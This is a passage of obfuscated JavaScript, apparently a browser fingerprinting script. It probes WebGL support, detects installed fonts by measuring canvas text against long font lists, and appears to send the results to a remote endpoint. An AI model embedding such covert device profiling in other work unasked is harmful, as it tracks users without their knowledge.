td_1V!==[][[]]+""){td_1V(td_1t,td_1w,td_1J);}if(typeof td_2T!==[][[]]+""){td_2T();}if(typeof td_3s!==[][[]]+""){td_3s();}if(typeof td_1B!==[][[]]+""){var td_Ia=td_1B(); if(td_Ia!==null){td_e3+=td_Ia;}}td_3C(td_0y,document);if(typeof td_3H!==[][[]]+""){td_3H();}if(td_0b.length>0){var td_av=new td_3f(td_1x.td_2X,td_1x.td_1m,td_0b);if(td_av.isValid()){td_av.scan();}}td_3A.load_iframe(td_2J,td_2c,document); if(typeof td_0x!==[][[]]+""){td_0x();}if(typeof td_3A.td_1y!==[][[]]+""){td_3A.td_1y();}if(typeof td_2H!==[][[]]+""){var td_AK=td_2H();if(td_AK){td_e3+=td_3A.tdz_8002ed3d8f7e49469f6dc946aa28b22e.td_f(151,5)+td_AK; }}return td_e3;}td_3A.tdz_ea4b90d19e014f2ba8062ea1449acce8=new td_3A.td_0j("\x65\x61\x34\x62\x39\x30\x64\x31\x39\x65\x30\x31\x34\x66\x32\x62\x61\x38\x30\x36\x32\x65\x61\x31\x34\x34\x39\x61\x63\x63\x65\x38\x30\x36\x30\x30\x35\x61\x31\x34\x35\x38\x34\x33\x31\x33\x35\x34\x35\x62\x30\x32\x35\x63\x35\x34\x34\x63\x31\x36\x35\x37\x31\x30\x30\x38\x35\x35\x35\x35\x35\x38\x34\x36\x30\x34\x30\x64\x31\x63\x34\x33\x35\x31\x35\x62\x30\x36\x30\x66\x30\x65\x30\x61\x34\x32\x34\x38\x31\x36\x35\x31\x30\x30\x35\x65\x35\x63\x31\x33\x35\x34\x35\x62\x30\x65\x35\x39\x34\x35\x31\x39\x35\x35\x35\x36\x30\x34\x31\x34\x35\x36\x35\x33\x34\x32\x35\x62\x30\x61\x30\x66"); var td_3A=td_3A||{};function td_T1(){if(!!window.WebGLRenderingContext){var td_KZ=document.createElement(td_3A.tdz_ea4b90d19e014f2ba8062ea1449acce8.td_f(0,6));var td_QH=[td_3A.tdz_ea4b90d19e014f2ba8062ea1449acce8.td_f(6,5),td_3A.tdz_ea4b90d19e014f2ba8062ea1449acce8.td_f(11,18),td_3A.tdz_ea4b90d19e014f2ba8062ea1449acce8.td_f(29,9),td_3A.tdz_ea4b90d19e014f2ba8062ea1449acce8.td_f(38,9)]; for(var td_dS=0;td_dS<4;td_dS++){try{var td_qG=td_KZ.getContext(td_QH[td_dS]);if(td_qG&&typeof td_qG.getParameter===td_3A.tdz_ea4b90d19e014f2ba8062ea1449acce8.td_f(47,8)){return{name:td_QH[td_dS],gl:td_qG}; }}catch(td_w0){}}return -1;}return 0;}td_3A.tdz_1c645a5ec932445687665ceec04dc1b4=new td_3A.td_0j("\x31\x63\x36\x34\x35\x61\x35\x65\x63\x39\x33\x32\x34\x34\x35\x36\x38\x37\x36\x36\x35\x63\x65\x65\x63\x30\x34\x64\x63\x31\x62\x34\x35\x32\x30\x32\x35\x38\x34\x32\x35\x34\x31\x32\x30\x37\x30\x31\x30\x34\x37\x34\x35\x30\x35\x36\x35\x31\x35\x32\x35\x32\x35\x65\x35\x31\x35\x64\x35\x64\x35\x61\x35\x38\x30\x64\x30\x61\x31\x35\x31\x32\x34\x32\x34\x37\x31\x30\x31\x36\x34\x37\x31\x35\x34\x63\x34\x38\x31\x39\x30\x36\x30\x35\x30\x37\x35\x32\x30\x31\x35\x30\x35\x35\x30\x65\x30\x62\x30\x62\x30\x33\x30\x36\x34\x35\x34\x65\x31\x38\x35\x61\x35\x39\x35\x38\x35\x61\x31\x30\x31\x35\x30\x34\x30\x30\x35\x35\x30\x33\x35\x36\x31\x33\x34\x39\x34\x32\x34\x37\x35\x34\x31\x31\x35\x66\x35\x32\x30\x32\x35\x33\x34\x35\x31\x64\x34\x33\x31\x65\x31\x34\x31\x65\x31\x34\x35\x39\x35\x61\x35\x38\x35\x37\x34\x34\x34\x36\x35\x37\x35\x36\x30\x36\x34\x32\x34\x39\x34\x33\x34\x33\x35\x31\x31\x36\x30\x61\x35\x37\x34\x34\x34\x33\x30\x63\x34\x35\x35\x63\x35\x32\x35\x62\x35\x63\x31\x33\x30\x66\x30\x35\x35\x31\x30\x65\x31\x34\x35\x65\x35\x32\x34\x31\x35\x38\x30\x35\x30\x37\x30\x63\x31\x30\x35\x66\x30\x35\x31\x31\x30\x62\x35\x65\x30\x31\x30\x65\x30\x64\x30\x36\x31\x37\x30\x38\x35\x32\x35\x64\x35\x65\x31\x30\x35\x65\x35\x31\x35\x63"); var td_3A=td_3A||{};var td_3Y;function td_3g(){try{var td_Cb=td_3z.getFontsList();if(td_Cb.length===0){return;}var td_u8=document.createElement(td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(0,6));if(!td_u8||!td_u8.getContext){return; }var td_mG=td_u8.getContext(td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(6,2));if(!td_mG){return;}if(typeof td_mG.measureText===[][[]]+""){return;}var td_r5=td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(8,36); td_mG.font=td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(44,14);var td_Tg=td_mG.measureText(td_r5).width;td_mG.font=td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(58,10);var td_Rb=td_mG.measureText(td_r5).width; var td_ng=td_W();var td_yX=0;var td_pz=0;var td_td="";var td_yy=false;for(var td_Lb=0;td_Lb<td_Cb.length;td_Lb++){td_mG.font=td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(68,6)+td_Cb[td_Lb]+td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(74,12); var td_lk=td_mG.measureText(td_r5).width;td_mG.font=td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(68,6)+td_Cb[td_Lb]+td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(86,8);var td_br=td_mG.measureText(td_r5).width; if(td_Tg!==td_lk||td_Rb!==td_br){td_pz++;td_td+=","+td_Cb[td_Lb];}if(td_3Y>0&&(td_Lb%5)===0){td_yX=td_W()-td_ng;if(td_yX>td_3Y){td_yy=true;break;}}}if(!td_td){return;}if(td_yX===0){td_yX=td_W()-td_ng;}var td_HZ=td_1f(td_td); var td_hh="";if(td_3q!==null){td_hh+=td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(94,3)+td_3q;}if(!td_yy){td_hh+=td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(97,5)+td_pz+td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(102,5)+td_HZ+td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(107,8)+td_yX+":"+td_pz; }else{td_hh+=td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(115,8)+td_yX+":"+td_pz;}var td_GF=td_td.length;var td_hs=false;if(typeof td_1I!==[][[]]+""){td_hs=td_1I;}if(td_GF>0&&td_hs&&!td_yy){var td_dy=1800; if(td_GF>td_dy&&td_0J._eq(td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(123,2))&&td_0p._eq("6")){var td_Hn=td_td.indexOf(",",td_dy);if(td_Hn!==-1){td_GF=td_Hn;}}td_hh+=td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(125,5)+td_td.substring(0,td_GF); }var td_rJ=td_0o+td_3A.tdz_1c645a5ec932445687665ceec04dc1b4.td_f(130,4)+td_3A.td_2D(td_hh,td_1o);td_2b(td_rJ,document);}catch(td_Zo){}}td_3Y = 1001;var td_0R=['Andale Mono','Arial','Arial Black','AR PL UKai CN','AR PL UMing CN','Batang','Bitstream Vera Sans','Comic Sans MS','Courier New','Cursor','DejaVu LGC Sans','DejaVu Sans','DejaVu Sans Mono','DejaVu Serif','Dotum','Droid Sans','FreeMono','FreeSans','FreeSerif','gargi','Garuda','Georgia','Hei','Impact','KacstArt','Kedage','Khmer OS','Khmer OS System','Kinnari','Liberation Sans Narrow','Lohit Bengali','Loma','Lucida Bright','Lucida Sans','Lucida Sans Typewriter','Luxi Mono','Mallige','Meera','Monospace','mry_KacstQurn','Mukti Narrow','NanumGothic','NanumMyeongjo','Nimbus Sans L Condensed','Norasi','OpenSymbol','ori1Uni','Phetsarath OT','Pothana2000','Purisa','Rachana','Rekha','Saab','Sawasdee','System','TakaoPGothic','Times','Times New Roman','TlwgMono','TlwgTypewriter','Tlwg Typist','Tlwg Typo','Trebuchet MS','Ubuntu','Ubuntu Condensed','Ume Gothic','Ume Mincho','Ume P Gothic','Ume P Mincho','Ume UI Gothic','Umpush','UnBatang','UnDinaru','UnDotum','UnGraphic','UnGungseo','UnPilgi','Untitled1','Utopia','Vemana2000','Verdana','Waree','Webdings','WenQuanYi Bitmap Song','WenQuanYi Micro Hei','WenQuanYi Zen Hei'];var td_3X=['18thCentury','8514oem','AcmeFont','Adobe Arabic','Agency FB','Aharoni','Aldhabi','Alfredo','Algerian','Alien Encounters','Almonte Snow','Amethyst','Andalus','Aparajita','Arabic Transparent','Arabic Typesetting','AR BERKLEY','Arial Baltic','Arial CE','Arial CYR','Arial Greek','Arial Narrow','Arial Rounded MT Bold','Arial TUR','Arial Unicode MS','Arimo','AR JULIAN','Asimov','Autumn','Baby Kruffy','Balthazar','Baskerville','Baskerville Old Face','Bastion','Batang','BatangChe','Bauhaus 93','Bellerose','Bell MT','Berlin Sans FB','Berlin Sans FB Demi','Bernard MT Condensed','Birch Std','Bitstream Vera Sans','Blackadder ITC','Blackoak Std','BN Jinx','BN Machine','Bobcat','Bodoni MT','Bodoni MT Black','Bodoni MT Poster Compressed','BolsterBold','Book Antiqua','Bookman Old Style','Bookshelf Symbol 7','Borealis','BOUTON International Symbols','Bradley Hand ITC','Brandish','Britannic Bold','Broadway','Browallia New','BrowalliaUPC','Brush Script MT','Brush Script Std','Brussels','Calibri','Calibri Light','Californian FB','Calisto MT','Calligraphic','Calvin','Cambria','Cambria Math','Candara','Candles','Castellar','Centaur','Century','Century Gothic','Century Schoolbook','Chaparral Pro','Chaparral Pro Light','Charlemagne Std','Chiller','Chinyen','Clarendon','Colbert','Colonna MT','Comic Sans MS','Commons','Consolas','Constantia','Coolsville','Cooper Black','Cooper Std Black','Copperplate','Corbel','Cordia New','CordiaUPC','Corporate','Courier New Baltic','Courier New CE','Cracked Johnnie','Creepygirl','Curlz MT','DaunPenh','David','Dayton','DejaVu Sans','Deneane','Detente','DFKai-SB','Digifit','DilleniaUPC','Distant Galaxy','DokChampa','Dominican','Dotum','DotumChe','Ebrima','Edwardian Script ITC','Elephant','Emmett','Engravers MT','Enliven','Eras Bold ITC','Ethnocentric','EucrosiaUPC','Euphemia','Expressway Rg','FangSong','Felix Titling','Fingerpop','Fixedsys','Flubber','Footlight MT Light','Forte','Frankfurter Venetian TT','Franklin Gothic Book','Franklin Gothic Medium Cond','FrankRuehl','FreesiaUPC','Freestyle Script','French Script MT','Gabriola','Gadugi','Garamond','Gazzarelli','Gentium Basic','Gentium Book Basic','Geotype TT','Giddyup Std','Gigi','Gill Sans','Gill Sans MT','Gill Sans MT Condensed','Gill Sans MT Ext Condensed Bold','Gill Sans Ultra Bold','Gill Sans Ultra Bold Condensed','Gisha','Glockenspiel','Gloucester MT Extra Condensed','Good Times','Goudy Old Style','Goudy Stout','Greek Diner Inline TT','Gulim','GulimChe','Gungsuh','GungsuhChe','Haettenschweiler','Hand Me Down S (BRK)','Hansen','Harlow Solid Italic','Harrington','Harvest','HarvestItal','Haxton Logos TT','Heavy Heap','Hei','Helvetica','Helvetica LT Std','HelveticaNeueLT Com 107 XBlkCn','Highboot','High Tower Text','Hobo Std','Hollywood Hills','Hombre','Huxley Titling','Imprint MT Shadow','Induction','Informal Roman','IrisUPC','Iskoola Pota','Italianate','JasmineUPC','Jokerman','Juice ITC','Kai','KaiTi','Kalinga','Kartika','Khmer UI','KodchiangUPC','Kokila','Kozuka Gothic Pr6N B','Kristen ITC','Kunstler Script','Lao UI','Latha','Leelawadee','Letter Gothic Std','LetterOMatic!','Levenim MT','LilyUPC','Limousine','Lithos Pro Regular','LittleLordFontleroy','Lucida Bright','Lucida Calligraphy','Lucida Fax','Lucida Handwriting','Lucida Sans Typewriter','Mael','Magneto','Maiandra GD','Malgun Gothic','Manorly','Martina','Matura MT Script Capitals','Meiryo','Meiryo UI','MelodBold','Mesquite Std','Microsoft Himalaya','Microsoft JhengHei','Microsoft JhengHei UI','Microsoft New Tai Lue','Microsoft PhagsPa','Microsoft Tai Le','Microsoft Uighur','Microsoft YaHei','Microsoft YaHei UI','Microsoft Yi Baiti','Minerva','MingLiU','MingLiU-ExtB','MingLiU_HKSCS','Minion Pro','Miriam','Mistral','Modern','Modern No. 20','Mongolian Baiti','Monotype Corsiva','MoolBoran','Moonbeam','MS Gothic','MS Mincho','MS Outlook','MS PGothic','MS PMincho','MS Reference Sans Serif','MS Reference Specialty','MS Sans Serif','MS Serif','MS UI Gothic','MT Extra','Myanmar Text','Mycalc','Myriad Arabic','Myriad Hebrew','Myriad Pro','Narkisim','Nasalization','Neon Lights','Niagara Engraved','Niagara Solid','Nina','Nirmala UI','Notram','November','NSimSun','Nueva Std','Nueva Std Cond','Nyala','OCR A Extended','OCR A Std','Old English Text MT','Onyx','OpenSymbol','OpineHeavy','Orator Std','Palace Script MT','Palatino','Papyrus','Parchment','Parry Hotter','PenultimateLight','Perpetua','Perpetua Titling MT','PhrasticMedium','Pirate','Plantagenet Cherokee','Playbill','PMingLiU','PMingLiU-ExtB','Poor Richard','Poplar Std','PR Celtic Narrow','Prestige Elite Std','Pristina','QuiverItal','Rage Italic','Ravie','Rockwell','Rockwell Condensed','Rod','Roland','Rondalo','Rosewood Std Regular','RowdyHeavy','Russel Write TT','Sakkal Majalla','Salina','Script','Script MT Bold','Segoe Print','Segoe UI Semilight','Segoe UI Symbol','SF Movie Poster','Shonar Bangla','Showcard Gothic','SimHei','Simplified Arabic','Simplified Arabic Fixed','SimSun','SimSun-ExtB','Skinny','Small Fonts','Snap ITC','Snowdrift','Source Code Pro','Splash','Stencil','Stencil Std','Stephen','SWGamekeys MT','System','Tarzan','Tekton Pro','Tekton Pro Cond','Tekton Pro Ext','Tempus Sans ITC','Terminal','Terminator Two','Times New Roman Baltic','Toledo','Traditional Arabic','Trajan Pro','Tw Cen MT','Urdu Typesetting','Utsaah','Valken','Vani','Vijaya','Viner Hand ITC','Vivaldi','Vivian','Vladimir Script','Vrinda','Waverly','Whimsy TT','Wide Latin','Wingdings 2','Woodcut','X-Files','Year supply of fairy cakes'];var td_2V=['Abadi MT Condensed Extra Bold','Abadi MT Condensed Light','Al Bayan Bold','Al Bayan Plain','American Typewriter Bold','American Typewriter Condensed','American Typewriter Light','Apple Braille Outline 6 Dot','Apple Braille Pinpoint 6 Dot','AppleGothic Regular','Apple LiGothic Medium','Apple LiSung Light','AppleMyungjo Regular','Apple SD Gothic Neo','Apple SD GothicNeo ExtraBold','Apple SD Gothic Neo Regular','Arial Bold','Arial Bold Italic','Arial Hebrew Bold','Arial Italic','Arial Narrow Bold','Arial Narrow Bold Italic','Arial Narrow Italic','Avenir','Avenir Black','Avenir Next','Avenir Next Bold','Avenir Next Condensed','Avenir Next Condensed Bold','Avenir Next Demi Bold','Avenir Next Heavy','Avenir Next Regular','Bangla MN Bold','Bangla Sangam MN Bold','Baskerville Bold','Baskerville Bold Italic','Baskerville SemiBold','Baskerville SemiBold Italic','Bell MT Bold','Bell MT Italic','Bernard MT Condensed','Big Caslon Medium','Book Antiqua','Book Antiqua Bold','Bookman Old Style','Bookman Old Style Bold','Bookshelf Symbol 7','Braggadocio','Britannic Bold','Brush Script MT Italic','Calibri','Calibri Bold','Calibri Light','Calisto MT','Calisto MT Bold','Cambria','Cambria Bold','Cambria Math','Candara Bold','Century','Century Gothic','Century Gothic Bold','Century Schoolbook','Century Schoolbook Bold','Chalkboard Bold','Chalkboard SE','Chalkboard SE Bold','Cochin Bold','Colonna MT','Comic Sans MS Bold','Consolas','Consolas Bold','Constantia','Constantia Bold','Cooper Black','Copperplate Bold','Copperplate Gothic Bold','Copperplate Light','Corbel','Corbel Bold','Corsiva Hebrew Bold','Courier Bold','Courier New Bold','Courier New Italic','Courier Oblique','Curlz MT','Damascus Bold','Desdemona','Devanagari MT Bold','Didot Bold','Edwardian Script ITC','Engravers MT','Engravers MT Bold','Euphemia UCAS Bold','Eurostile','Eurostile Bold','Footlight MT Light','Franklin Gothic Book','Franklin Gothic Book Italic','Franklin Gothic Medium','Franklin Gothic Medium Italic','Futura Condensed ExtraBold','Futura Medium','Gabriola','Garamond','Garamond Bold','Geeza Pro Bold','Georgia Bold','Gill Sans Bold','Gill Sans MT','Gill Sans MT Bold','Gill Sans MT Italic','Gill Sans Ultra Bold','Gloucester MT Extra Condensed','Goudy Old Style','Goudy Old Style Bold','Gujarati MT Bold','Gujarati Sangam MN Bold','Gulim','GungSeo Regular','Gurmukhi MN Bold','Gurmukhi Sangam MN','Gurmukhi Sangam MN Bold','Haettenschweiler','Harrington','HeadLineA Regular','Hei Regular','Heiti SC Light','Heiti TC Light','Helvetica Bold','Helvetica CY Bold','Helvetica CY Plain','Helvetica Light','Helvetica Neue Bold','Helvetica Neue Medium','Helvetica Oblique','Hiragino Kaku Gothic ProN W3','Hiragino Kaku Gothic Pro W3','Hiragino Kaku Gothic StdN W8','Hiragino Maru Gothic ProN W4','Hiragino Mincho ProN W3','Hiragino Mincho ProN W6','Hiragino Sans GB W3','Hiragino Sans GB W6','Hoefler Text Black','Hoefler Text Ornaments','Imprint MT Shadow','Kailasa Regular','Kai Regular','Kaiti SC','Kaiti SC Black','Kannada MN Bold','Kannada Sangam MN Bold','Kefa Bold','Khmer MN Bold','Kino MT','Kokonor Regular','Lucida Blackletter','Lucida Bright','Lucida Bright Demibold','Lucida Bright Demibold Italic','Lucida Bright Italic','Lucida Calligraphy','Lucida Calligraphy Italic','Lucida Console','Lucida Fax','Lucida Fax Demibold','Lucida Fax Regular','Lucida Grande Bold','Lucida Handwriting','Lucida Handwriting Italic','Lucida Sans','Lucida Sans Demibold Italic','Lucida Sans Typewriter','Lucida Sans Typewriter Bold','Lucida Sans Unicode','Malayalam MN Bold','Malayalam Sangam MN Bold','Marion','Marion Bold','Marker Felt Thin','Marlett','Matura MT Script Capitals','Meiryo','Meiryo Bold','Menlo Bold','Microsoft Himalaya','Microsoft Tai Le','Microsoft Tai Le Bold','Microsoft Yi Baiti','MingLiU','MingLiU-ExtB','MingLiU_HKSCS','Mistral','Modern','Modern No. 20','Mongolian Baiti','Monotype Corsiva','Monotype Sorts','MS Gothic','Mshtakan Bold','MS Mincho','MS PGothic','MS PMincho','MS Reference Sans Serif','MS Reference Specialty','MT Extra','Myanmar MN Bold','NanumGothic','Nanum Gothic','NanumGothic Bold','NanumMyeongjo','Nanum Myeongjo','NanumMyeongjo Bold','New Peninim MT Bold','News Gothic MT','News Gothic MT Bold','Noteworthy Bold','Onyx','Optima Bold','Optima Regular','Oriya MN Bold','Oriya Sangam MN Bold','Osaka-Mono','Palatino Bold','Palatino Linotype','Palatino Linotype Bold','Papyrus Condensed','PCMyungjo Regular','Perpetua','Perpetua Bold','Perpetua Titling MT','Perpetua Titling MT Bold','PilGi Regular','Playbill','PMingLiU','PMingLiU-ExtB','PT Sans Bold','PT Sans Caption Bold','PT Sans Narrow Bold','Raanana Bold','Rockwell','Rockwell Bold','Rockwell Extra Bold','Rockwell Italic','SimHei','SimSun','Sinhala MN Bold','Sinhala Sangam MN Bold','Skia Regular','Songti SC','Songti SC Black','Stencil','STIXGeneral-Bold','STIXGeneral-Regular','STIXIntegralsD-Bold','STIXIntegralsSm-Bold','STIXIntegralsUp-Bold','STIXIntegralsUpD-Bold','STIXIntegralsUpD-Regular','STIXIntegralsUp-Regular','STIXIntegralsUpSm-Bold','STIXNonUnicode-Bold','STIXSizeFiveSym-Regular','STIXSizeFourSym-Bold','STIXSizeOneSym-Bold','STIXSizeThreeSym-Bold','STIXSizeTwoSym-Bold','STIXVariants-Bold','STXihei','Tahoma Negreta','Tamil MN Bold','Tamil Sangam MN Bold','Telugu MN Bold','Telugu Sangam MN Bold','Thonburi Bold','Times Bold','Times New Roman Bold','Times New Roman Italic','Times Roman','Trebuchet MS Bold','Tw Cen MT','Tw Cen MT Bold','Tw Cen MT Italic','Verdana Bold','Wide Latin','Yuppy SC','Yuppy SC Regular','Yuppy TC','Yuppy TC Regular'];var td_1X=['AR PL UKai CN','AR PL UMing CN','AR PL UMing HK','AR PL UMing TW','AR PL UMing TW MBE','Andale Mono','Arial','Arial Black','Arial Unicode MS','Baskerville','Batang','Bitstream Charter','Bitstream Vera Sans','Carrois Gothic SC','Century Schoolbook L','Comic Sans MS','Courier 10 Pitch','Courier New','Cursor','Cutive Mono','Dancing Script','DejaVu LGC Sans','DejaVu Sans','DejaVu Sans Mono','DejaVu Serif','Dingbats','Dotum','Droid Sans','Droid Sans Mono','FreeMono','FreeSans','FreeSerif','Garuda','Gentium','GentiumAlt','Georgia','Goudy','Hei','ITC Stone Serif','Impact','KacstArt','KacstBook','KacstDecorative','KacstDigital','KacstFarsi','KacstLetter','KacstNaskh','KacstOffice','KacstOne','KacstPen','KacstPoster','KacstQurn','KacstScreen','KacstTitle','KacstTitleL','Kedage','Khmer OS','Khmer OS System','Kinnari','Liberation Mono','Liberation Sans','Liberation Sans Narrow','Liberation Serif','Lohit Bengali','Lohit Devanagari','Lohit Gujarati','Lohit Hindi','Lohit Punjabi','Lohit Tamil','Loma','Lucida Bright','Lucida Sans','Lucida Sans Typewriter','Luxi Mono','Mallige','Meera','Monaco','Monospace','MotoyaLMaru','Mukti Narrow','NanumBarunGothic','NanumGothic','NanumGothicCoding','NanumMyeongjo','Nimbus Mono L','Nimbus Roman No9 L','Nimbus Sans L','Nimbus Sans L Condensed','Norasi','Noto Emoji','Noto Naskh Arabic','Noto Sans','Noto Serif','OldeEnglish','OpenSymbol','Palatino','Phetsarath OT','Pothana2000','Purisa','Rachana','Rekha','Roboto','Saab','Samyak Tamil','Sans','Sawasdee','Serif','Standard Symbols L','System','TakaoExGothic','TakaoExMincho','TakaoGothic','TakaoMincho','TakaoPGothic','TakaoPMincho','Times','Times New Roman','Tlwg Typist','Tlwg Typo','TlwgMono','TlwgTypewriter','Trebuchet MS','URW Bookman L','URW Chancery L','URW Gothic L','URW Palladio L','Ubuntu','Ubuntu Condensed','Ubuntu Mono','Ume Gothic','Ume Mincho','Ume P Gothic','Ume P Mincho','Ume UI Gothic','Umpush','UnBatang','UnDinaru','UnDotum','UnGraphic','UnGungseo','UnPilgi','Untitled1','Utopia','Vemana2000','Verdana','Waree','Webdings','WenQuanYi Bitmap Song','WenQuanYi Micro Hei','WenQuanYi Micro Hei Mono','WenQuanYi Zen Hei','Zawgyi-One','gargi','mry_KacstQurn','ori1Uni'];var td_2k=['AR PL UMing CN','AR PL UMing HK','AR PL UMing TW','AR PL UMing TW MBE','Arial','Arial Unicode MS','Baskerville','Bitstream Charter','Carrois Gothic SC','Century Schoolbook L','Copperplate','Courier 10 Pitch','Courier New','Cutive Mono','Dancing Script','DejaVu Sans','DejaVu Sans Mono','DejaVu Serif','Didot','Dingbats','Droid Sans Mono','FreeMono','FreeSans','FreeSerif','Futura','Garuda','Georgia','Gill Sans','Helvetica','Hoefler Text','KacstArt','KacstBook','KacstDecorative','KacstDigital','KacstFarsi','KacstLetter','KacstNaskh','KacstOffice','KacstOne','KacstPen','KacstPoster','KacstQurn','KacstScreen','KacstTitle','KacstTitleL','Kedage','Khmer OS','Khmer OS System','Kinnari','Liberation Mono','Liberation Sans','Liberation Sans Narrow','Liberation Serif','Lohit Bengali','Lohit Gujarati','Lohit Hindi','Lohit Punjabi','Lohit Tamil','Loma','Lucida Grande','Mallige','Meera','Monaco','Monospace','MotoyaLMaru','Mukti Narrow','NanumGothic','NanumMyeongjo','Nimbus Mono L','Nimbus Roman No9 L','Nimbus Sans L','Norasi','Noto Emoji','Noto Naskh Arabic','Noto Sans','Noto Sans Armenian','Noto Sans Bengali','Noto Sans Canadian Aboriginal','Noto Sans Cherokee','Noto Sans Devanagari','Noto Sans Ethiopic','Noto Sans Georgian','Noto Sans Gujarati','Noto Sans Gurmukhi','Noto Sans Hebrew','Noto Sans JP','Noto Sans KR','Noto Sans Kannada','Noto Sans Khmer','Noto Sans Lao','Noto Sans Malayalam','Noto Sans Myanmar','Noto Sans Oriya','Noto Sans SC','Noto Sans Sinhala','Noto Sans Symbols','Noto Sans TC','Noto Sans Tamil','Noto Sans Telugu','Noto Sans Thai','Noto Sans Yi','Noto Serif','OpenSymbol','Optima','Palatino','Palatino Linotype','Papyrus','Phetsarath OT','Pothana2000','Purisa','Rachana','Rekha','Roboto','Saab','Sans','Sawasdee','Serif','Standard Symbols L','Symbol','TAMu_Kadambri','TAMu_Kalyani','TAMu_Maduram','TSCu_Comic','TSCu_Paranar','TSCu_Times','TakaoExGothic','TakaoExMincho','TakaoGothic','TakaoMincho','TakaoPGothic','TakaoPMincho','Tlwg Typist','Tlwg Typo','TlwgMono','TlwgTypewriter','Trebuchet MS','URW Bookman L','URW Chancery L','URW Gothic L','URW Palladio L','Ubuntu','Ubuntu Condensed','Ubuntu Mono','Umpush','UnBatang','UnDinaru','UnDotum','UnGraphic','UnGungseo','UnPilgi','Untitled1','Vemana2000','Verdana','Waree','WenQuanYi Micro Hei','WenQuanYi Micro Hei Mono','Zawgyi-One','gargi','mry_KacstQurn','ori1Uni'];td_3A.tdz_2830edf2cf414178804b47a1ec8c76df=new td_3A.td_0j("\x32\x38\x33\x30\x65\x64\x66\x32\x63\x66\x34\x31\x34\x31\x37\x38\x38\x30\x34\x62\x34\x37\x61\x31\x65\x63\x38\x63\x37\x36\x64\x66\x35\x34\x34\x64\x35\x64\x35\x33\x31\x31\x30\x64\x30\x39\x35\x63\x31\x36\x30\x38\x35\x66\x35\x66\x35\x62\x34\x36\x35\x39\x35\x62\x35\x37\x35\x64\x34\x34\x30\x65\x35\x31\x34\x33\x30\x34\x35\x65\x30\x62\x30\x66\x35\x37\x30\x32\x35\x33"); function td_n(td_L,td_m,td_z){if(typeof td_z===[][[]]+""||td_z===null){td_z=0;}else{if(td_z<0){td_z=Math.max(0,td_L.length+td_z);}}for(var td_T=td_z,td_j=td_L.length;td_T<td_j;td_T++){if(td_L[td_T]===td_m){return td_T; }}return -1;}function td_u(td_K,td_s,td_H){return td_K.indexOf(td_s,td_H);}function td_I(td_t){return td_t.replace(/^\s+|\s+$/g,"");}function td_c(td_Z){return td_Z.trim();}function td_2Z(td_w){return td_w.trim(); }function td_2x(td_e,td_P,td_V){return td_e.indexOf(td_P,td_V);}function td_W(){return Date.now();}function td_d(){return new Date().getTime();}function td_q(){if(!Array.prototype.indexOf){td_2x=td_n;}else{td_2x=td_u; }if(typeof String.prototype.trim!==td_3A.tdz_2830edf2cf414178804b47a1ec8c76df.td_f(0,8)){td_2Z=td_I;}else{td_2Z=td_c;}if(typeof Date.now===[][[]]+""){td_W=td_d;}}function td_2t(td_r){if(typeof document.readyState!==[][[]]+""&&typeof document.readyState!==td_3A.tdz_2830edf2cf414178804b47a1ec8c76df.td_f(8,7)&&document.readyState===td_3A.tdz_2830edf2cf414178804b47a1ec8c76df.td_f(15,8)){td_r(); }else{if(typeof document.readyState===[][[]]+""){setTimeout(td_r,300);}else{var td_e=200;var td_p;if(typeof window!==[][[]]+""&&typeof window!==td_3A.tdz_2830edf2cf414178804b47a1ec8c76df.td_f(8,7)&&window!==null){td_p=window; }else{td_p=document.body;}if(td_p.addEventListener){td_p.addEventListener(Number(343388).toString(25),function(){setTimeout(td_r,td_e);},false);}else{if(td_p.attachEvent){td_p.attachEvent(td_3A.tdz_2830edf2cf414178804b47a1ec8c76df.td_f(23,6),function(){setTimeout(td_r,td_e); },false);}else{var td_S=td_p.onload;td_p.onload=new function(){var td_T=true;if(td_S!==null&&typeof td_S===td_3A.tdz_2830edf2cf414178804b47a1ec8c76df.td_f(0,8)){td_T=td_S();}setTimeout(td_r,td_e);td_p.onload=td_S; return td_T;};}}}}}function td_E(){if(typeof td_0g!==[][[]]+""){td_0g();}if(typeof td_0K!==[][[]]+""){td_0K();}if(typeof td_1C!==[][[]]+""){td_1C();}if(typeof td_2q!==[][[]]+""){td_2q(td_3V);}if(typeof td_0H!==[][[]]+""){td_0H(); }if(typeof td_2a!==[][[]]+""){td_2a();}if(typeof td_0P!==[][[]]+""){td_0P.start();}}function td_1l(){td_3A.td_1T();td_3A.td_1F(document);td_1x.td_2s();td_q();td_2t(td_E);}td_3A.tdz_3552e057ffa04a6289317abc3331b6fd=new 